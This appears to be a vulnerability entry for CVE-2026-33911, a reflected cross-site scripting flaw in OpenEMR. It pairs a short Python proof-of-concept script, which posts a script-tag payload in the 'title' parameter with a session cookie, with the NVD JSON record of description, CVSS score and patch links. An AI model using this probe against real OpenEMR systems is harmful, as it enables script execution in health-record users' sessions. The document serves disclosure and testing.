CVE-2026-33911

import requests # Target URL (Replace with actual vulnerable endpoint) target_url = "http://target-openemr-instance/path/to/vulnerable/endpoint" # Attacker's session cookie (Authentication required) session_cookie = "PHPSESSID=attacker_session_id; OpenEMR=auth_token" headers = { "Cookie": session_cookie, "Content-Type": "application/x-www-form-urlencoded" } # Malicious payload to be injected into the 'title' parameter # Using a simple script tag to demonstrate execution payload = "<script>alert('XSS CVE-2026-33911');</script>" data = { "title": payload } try: response = requests.post(target_url, headers=headers, data=data) # Check if the response Content-Type is text/html (vulnerable behavior) content_type = response.headers.get('Content-Type', '') if "text/html" in content_type: print(f"[+] Potential Vulnerability Detected!") print(f"[+] Response Content-Type: {content_type}") print(f"[+] Response Content: {response.text[:200]}...") else: print("[-] Response Content-Type is not text/html. Might be patched.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33911", "sourceIdentifier": "[email protected]", "published": "2026-03-25T23:17:10.337", "lastModified": "2026-03-26T16:23:28.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, the POST parameter `title` is reflected back in a JSON response built with `json_encode()`. Because the response is served with a `text/html` Content-Type, the browser interprets injected HTML/script tags rather than treating the output as JSON. An authenticated attacker can craft a request that executes arbitrary JavaScript in a victim's session. Version 8.0.0.3 contains a fix."}, {"lang": "es", "value": "OpenEMR es una aplicación gratuita y de código abierto para registros de salud electrónicos y gestión de consultorios médicos. Antes de la versión 8.0.0.3, el parámetro POST 'title' se refleja en una respuesta JSON construida con 'json_encode()'. Debido a que la respuesta se sirve con un Content-Type 'text/html', el navegador interpreta las etiquetas HTML/script inyectadas en lugar de tratar la salida como JSON. Un atacante autenticado puede elaborar una solicitud que ejecuta JavaScript arbitrario en la sesión de una víctima. La versión 8.0.0.3 contiene una corrección."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.3", "matchCriteriaId": "E3E098AF-42A1-4798-85A7-80052F19F809"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/64e8befa0a49f85dd5e2a85c91f3f8b9e565896f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/releases/tag/v8_0_0_3", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-wwhf-6cvc-6766", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}